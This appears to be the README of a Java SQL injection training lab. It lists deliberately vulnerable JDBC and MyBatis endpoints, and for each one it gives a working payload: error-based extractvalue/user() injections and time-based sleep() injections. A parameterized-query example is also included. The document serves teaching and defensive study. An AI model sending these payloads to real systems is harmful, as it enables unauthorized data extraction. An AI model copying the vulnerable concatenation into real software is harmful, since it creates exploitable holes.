/JavaSec-SQLInject-Demo

SQLInject

Primary language: Java. License: Apache License 2.0 (Apache-2.0)

Java SQL injection lab

Deployment

Edit the database settings in src/main/resources/application-dev.yml.

Import the table into the database from src/main/resources/user.sql.

I. JDBC

src/main/java/com/uzju/dongtai_sql_inject_lab/controller/JDBCInject.java

1. + concatenation

1.1. PAYLOAD

/jdbc/statement_and_inject?id=1'+and+extractvalue(1,concat(0x7e,user()))--+

1.2. Implementation code

2. prepareStatement injection with + concatenation

2.1. PAYLOAD

/jdbc/preparestatement_and_inject?id=1'+and+extractvalue(1,concat(0x7e,user()))--+

2.2. Implementation code

3. prepareStatement order by injection

3.1. PAYLOAD

/jdbc/preparestatement_orderby_inject?id=1&orderby=id+and+extractvalue(1,concat(0x7e,user()))

3.2. Implementation code

4. prepareStatement like injection

4.1. PAYLOAD

/jdbc/preparestatement_like_inject?id=1%25'+and+extractvalue(1,concat(0x7e,user()))--+

4.2. Implementation code

5. prepareStatement in injection

5.1. PAYLOAD

/jdbc/preparestatement_in_inject?id=1)+and+extractvalue(1,concat(0x7e,user()))--+

5.2. Implementation code
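
The five JDBC cases above differ only in where the request parameter reaches the SQL text. As an added example (not code from this repository; the class name, the `user` table and its `id`/`username` columns are assumptions), the concatenated shape is shown beside bound parameters for LIKE and IN and an allow-list for ORDER BY, with a `main` that needs no database:

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.util.List;
import java.util.Set;

public class SafeJdbcQueries {
    // Assumed schema: table `user` with columns `id` and `username`.
    private static final Set<String> SORTABLE = Set.of("id", "username");

    // Vulnerable shape (cases 1 and 2): the input becomes SQL text, so even
    // prepareStatement() compiles whatever the caller supplied.
    static String concatenated(String id) {
        return "SELECT * FROM user WHERE id = '" + id + "'";
    }

    // ORDER BY takes an identifier, which cannot be bound: check an allow-list.
    static String orderBySql(String column) {
        if (!SORTABLE.contains(column)) throw new IllegalArgumentException("unsupported sort column");
        return "SELECT * FROM user WHERE id = ? ORDER BY " + column;
    }

    // IN (...): one placeholder per element; only the element count shapes the SQL.
    static String inSql(int count) {
        if (count < 1) throw new IllegalArgumentException("empty id list");
        return "SELECT * FROM user WHERE id IN (?" + ", ?".repeat(count - 1) + ")";
    }

    // LIKE: the wildcards are added here; the user's own % and _ are escaped with '!'.
    static String likePattern(String term) {
        return "%" + term.replace("!", "!!").replace("%", "!%").replace("_", "!_") + "%";
    }

    static PreparedStatement byUsername(Connection c, String term) throws SQLException {
        PreparedStatement ps = c.prepareStatement("SELECT * FROM user WHERE username LIKE ? ESCAPE '!'");
        ps.setString(1, likePattern(term)); // the whole pattern travels as data
        return ps;
    }

    static PreparedStatement byIds(Connection c, List<Integer> ids) throws SQLException {
        PreparedStatement ps = c.prepareStatement(inSql(ids.size()));
        for (int i = 0; i < ids.size(); i++) ps.setInt(i + 1, ids.get(i));
        return ps;
    }

    public static void main(String[] args) {
        String probe = "1%' and extractvalue(1,concat(0x7e,user()))-- "; // case 4 payload, URL-decoded
        System.out.println(concatenated(probe));                  // input has become SQL syntax
        System.out.println(likePattern(probe) + " | " + inSql(3)); // input stays a bound value
        try { orderBySql(probe); } catch (IllegalArgumentException e) { System.out.println("rejected: " + e.getMessage()); }
    }
}
```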

II. Mybatis

1. mybatis ${} injection

1.1. PAYLOAD

/mybatis/getUser_inject?id=1+and+sleep(3)

2. mybatis order by injection

2.1. PAYLOAD

/mybatis/getUser_orderby_inject?id=1&getparse=id+and+if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test))

3. mybatis like injection

3.1. PAYLOAD

/mybatis/getUser_like_inject?id=1&username=admin'+and+sleep(3)--+

4. mybatis in injection

4.1. PAYLOAD

/mybatis/getUser_in_inject?id=1)+and+sleep(3)--+
